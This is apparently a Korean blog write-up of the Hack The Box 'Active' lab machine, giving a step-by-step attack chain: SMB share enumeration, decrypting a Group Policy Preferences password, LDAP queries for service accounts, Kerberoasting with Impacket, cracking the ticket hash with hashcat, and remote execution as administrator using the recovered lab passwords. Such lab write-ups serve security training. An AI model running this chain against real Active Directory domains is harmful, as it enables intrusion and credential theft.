본문 바로가기
IT/HTB

Hack The Box - Active Writeup

by 콰나 | Quanna 2026. 2. 5.

How many SMB shares are shared by the target?

Nmap scan report for app.htb (10.129.45.168)
Host is up (0.19s latency).
Not shown: 983 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-21 07:40:23Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2026-01-21T07:41:21
|_  start_date: 2026-01-21T07:23:56
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 430.33 seconds
smbclient -L 10.129.45.168 -N

What is the name of the share that allows anonymous read access?

smbmap -H app.htb

Which file has encrypted account credentials in it?

Download all data using smbclient smbclient 사용하여 모든 데이터 다운로드

smbclient //app.htb/Replication#smbrecurse onprompt offmget **

Password hash found in Groups.xml file downloaded 다운받은 파일에서 Groups.xml 발견한 password hash 

What is the decrpyted password for the SVC_TGS account?

Policies에서 찾은 groups.xml은 GPP를 통해 저장할 때 AES-256으로 암호화 groups.xml found in Policies is encrypted with AES-256 when saved via GPP

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

 

 

Submit the flag located on the security user’s desktop.

smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H app.htb

smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //app.htb/Users#clientget user.txt

 

Which service account on Active is vulnerable to Kerberoasting?

#활성화된 관리자 계정 식별ldapsearch -x -H 'ldap://app.htb' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName

python3 GetADUsers.py -all active.htb/svc_tgs -dc-ip app.htb

Kerberoasting

ldapsearch -x -H 'ldap://app.htb' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName

python3 GetUserSPNs.py active.htb/svc_tgs -dc-ip app.htb  

administrator 해시값 추출

python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip app.htb -request

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable

impacket-wmiexec 'active.htb/administrator:Ticketmaster1968@10.129.46.170'

반응형

'IT > HTB' 카테고리의 다른 글

Hack The Box - Nibbles Writeup  (0) 2026.02.09